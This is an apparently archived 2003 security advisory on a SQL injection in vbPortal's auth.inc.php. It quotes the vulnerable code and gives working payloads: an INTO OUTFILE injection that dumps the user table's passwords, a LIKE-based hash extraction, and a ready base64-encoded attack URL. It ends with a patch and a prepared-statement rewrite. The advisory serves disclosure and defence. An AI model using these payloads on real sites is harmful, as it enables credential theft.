Informations :
°°°°°°°°°°°°°

Language : PHP
Version : 2.0 alpha 8.1
Website : http://www.vbportal.com
Problem : SQL Injection
Description : vbPortal is a portal built to complement vBulletin as a CMS.

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

auth.inc.php :

-----------------------------------------------------------------------------------------
[...]
if(isset($admin)) {
    // $admin arrives as base64("username:password"); base64 hides any quote
    // from magic_quotes_gpc, so nothing is escaped on the way in
    $admin = base64_decode($admin);
    $admin = explode(":", $admin);
    $aid = "$admin[0]";   // username, taken verbatim from the decoded value
    $pwd = "$admin[1]";
    if ($aid=="" || $pwd=="") {
        $admintest=0;
        echo "<html>\n";
        echo "<title>INTRUDER ALERT!!!</title>\n";
        echo "<body bgcolor=\"#FFFFFF\" text=\"#000000\">\n\n<br><br><br>\n\n";
        echo "<center><img src=\"images/eyes.gif\" border=\"0\"><br><br>\n";
        echo "<font face=\"Verdana\" size=\"+4\"><b>Get Out!</b></font></center>\n";
        echo "</body>\n";
        echo "</html>\n";
        exit;
    }
    // $aid is interpolated into the query unescaped: this is the injection point
    $result=mysql_query("SELECT password as pwd FROM user WHERE username = '$aid'");
    // $result=mysql_query("select pwd from $prefix"._authors." where aid='$aid'");
    if(!$result) {
        echo "Selection from database failed!";
        exit;
    } else {
        list($pass)=mysql_fetch_row($result);
        if($pass == $pwd && $pass != "") {
            $admintest = 1;
        }
    }
}
[...]
-----------------------------------------------------------------------------------------

Exploit :
°°°°°°°

The injection is made through $aid. If the value of $aid is ' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt, the SQL request becomes :

SELECT password as pwd FROM user WHERE username = '' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt'

and the passwords of the table user are written into UserTable.txt, which is readable at http://[target]/UserTable.txt if '/complete/path/' is the right path to the website directory.

Passwords can also be cracked using LIKE. For example, to find out whether the hashed password begins with 'a', you can give $aid the value ' OR pwd LIKE 'a%.

To inject either of these two possibilities, $admin has to be built like this : base64([VALUETOGIVETO$AID]:1). E.g. : to use the first example, we have to encode ' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt:1 in base64, like this :

JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE=

and inject it via $admin like this :

http://[target]/auth.inc.php?admin=JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE=

This will of course work whether magic_quotes_gpc is ON or OFF, because the quote reaches PHP inside the base64 value and is only produced by base64_decode(), after magic quotes has already run.

Solution :
°°°°°°°°°

A patch can be found on http://www.phpsecure.info. You just have to replace the line :

---------------------
$aid = "$admin[0]";
---------------------

in auth.inc.php by :

-------------------------------
$aid = addslashes($admin[0]);
-------------------------------

More Details in French :
°°°°°°°°°°°°°°°°°°°°°°

http://www.phpsecure.info/v2/tutos/vbPortal.txt

frog-m@n (http://www.phpsecure.info)
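As an added example (not vbPortal's code and not the phpsecure patch), the same admin check rewritten with a PDO prepared statement, which removes the injection regardless of escaping or magic_quotes; it assumes a `$pdo` connection to the same `user` table with ERRMODE_EXCEPTION set and emulated prepares disabled, and keeps the page's base64("username:password") transport.

```php
<?php
// Added example, not vbPortal's code: the auth.inc.php check against PDO.
// Assumes $pdo is an open PDO connection (ATTR_ERRMODE => ERRMODE_EXCEPTION,
// ATTR_EMULATE_PREPARES => false) to the database holding the `user` table.
function is_admin_authenticated(PDO $pdo, ?string $admin): bool
{
    if ($admin === null) {
        return false;
    }
    // Same transport as the original: base64("username:password").
    // Strict decoding rejects values that are not valid base64 at all.
    $decoded = base64_decode($admin, true);
    if ($decoded === false) {
        return false;
    }
    $parts = explode(':', $decoded, 2);
    if (count($parts) !== 2 || $parts[0] === '' || $parts[1] === '') {
        return false;
    }
    [$aid, $pwd] = $parts;

    // The username is bound as data: a quote, "OR 1=1", "INTO OUTFILE" or
    // "LIKE 'a%" are just characters inside the parameter, never SQL text.
    $stmt = $pdo->prepare('SELECT password AS pwd FROM user WHERE username = ?');
    $stmt->execute([$aid]);
    $pass = $stmt->fetchColumn();
    if ($pass === false || $pass === '') {
        return false;   // unknown user or empty stored password
    }
    // The original compared $pass == $pwd; hash_equals does the same
    // comparison on the stored value in constant time and with strict types.
    return hash_equals((string) $pass, $pwd);
}

// Usage in place of the original block (hypothetical call site):
// $admintest = is_admin_authenticated($pdo, $_GET['admin'] ?? null) ? 1 : 0;
```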
This archive was generated by hypermail 2b30 : Fri Sep 12 2003 - 17:48:37 PDT